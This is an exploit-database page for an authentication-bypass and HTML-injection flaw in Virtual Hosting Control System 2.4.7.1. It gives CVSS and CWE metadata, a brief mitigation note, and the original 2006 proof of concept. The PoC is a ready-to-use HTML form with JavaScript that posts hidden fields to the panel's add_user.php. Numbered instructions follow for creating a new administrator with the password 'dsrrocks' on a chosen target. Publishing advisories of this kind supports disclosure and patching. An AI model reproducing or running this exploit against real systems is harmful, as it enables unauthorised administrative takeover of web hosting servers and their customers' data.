header-logo
Suggest Exploit
vendor:
Virtual Hosting Control System
by:
RoMaNSoFt
7.5
CVSS
HIGH
HTML-injection vulnerability and an authentication-bypass vulnerability
79, 287
CWE
Product Name: Virtual Hosting Control System
Affected Version From: 2.4.7.1
Affected Version To: 2.4.7.1
Patch Exists: NO
Related CWE: N/A
CPE: a:vhcs:vhcs
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

VHCS (version <= 2.4.7.1) PoC

VHCS is prone to an HTML-injection vulnerability and an authentication-bypass vulnerability. These issues could be exploited to gain administrative access to the application; other attacks are also possible. An attacker can exploit this issue by submitting malicious HTML code to the vulnerable application. This code will be executed in the context of the vulnerable application.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in the application. Additionally, ensure that the application is kept up-to-date with the latest security patches.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/16600/info
 
Virtual Hosting Control System (VHCS) is prone to multiple input and access vulnerabilities.
 
VHCS is prone to an HTML-injection vulnerability and an authentication-bypass vulnerability. These issues could be exploited to gain administrative access to the application; other attacks are also possible.


<html>

<head>
<title>VHCS (version <= 2.4.7.1) PoC. &nbsp;By RoMaNSoFt</title>
<script language="JavaScript">
function submitform()
{
  if (document.admin_add_user.username.value=='admin')
  {
    alert('Learn to read before launching an exploit, script-kiddie!');
    exit();
  }
  
  document.admin_add_user.action=document.admin_add_user.target.value;
  document.admin_add_user.submit();
}
</script>
</head>

<body>
  <hr>
  <center>
  	<b>VHCS (version <= 2.4.7.1) PoC. &nbsp;By RoMaNSoFt &#60roman&#64rs-labs.com&#62 &nbsp;[08.Feb.2006]</b>
  </center>
  <hr>
  
	<form name="admin_add_user" method="post" action="">
            <table width="100%" cellpadding="5" cellspacing="5">
              <tr>
                <td width="20">&nbsp;</td>
                <td colspan="2">
                  &nbsp;
                </td>
              </tr>
              <tr>
                <td width="20">&nbsp;</td> <td width="200">Target URL</td>
                <td> 
                  <input type="text" name="target" value="http://<target>/vhcs2/admin/add_user.php" style="width:400px">
                </td>
              </tr>
              
              <tr>
                <td width="20">&nbsp;</td> <td width="200">Username</td>
                <td> 
                  <input type="text" name="username" value="admin" style="width:200px">&nbsp;(should NOT exist)
                </td>
              </tr>
              <tr> 
                <td>&nbsp;</td>
                <td colspan="2"><a href="javascript: submitform()">Exploit it!</a></td>              
              </tr>
              <tr> 
                <td colspan="3">&nbsp; 
                  </td>
              </tr>
            </table>
            <input type="hidden" name="pass" value="dsrrocks">
            <input type="hidden" name="pass_rep" value="dsrrocks">
            <input type="hidden" name="email" value="vhcs-exploit@rs-labs.com">
            <input type="hidden" name="uaction" value="add_user">
        </form>
        
        <hr>
        <br>
        <u>Quick instructions</u>.-<br>
        <br>
        1.- Enable JavaScript. Fill in the form with appropiate target URL (usually you will only need to replace &#60target&#62 string) and username.<br>
        2.- Remember not to use a probably existing username (such as "admin").<br>
        3.- Launch the exploit. <i>If target system is vulnerable, a new VHCS admin user will be created</i> ;-)<br>
        4.- You will be redirected to VHCS login page. Try to login with your brand new username.<br>
        5.- Ummm, I forgot it... The password is: <b>dsrrocks</b>.<br>

        <br>
        <u>More info (analysis, fix, etc)</u>.-<br>
        <br>
        See <a href=http://www.rs-labs.com/adv/RS-Labs-Advisory-2006-1.txt><i>RS-2006-1</i></a>.<br>
				<br>
				<hr>
</body>

</html>

Navigation

Suggest Exploit

Services By CQR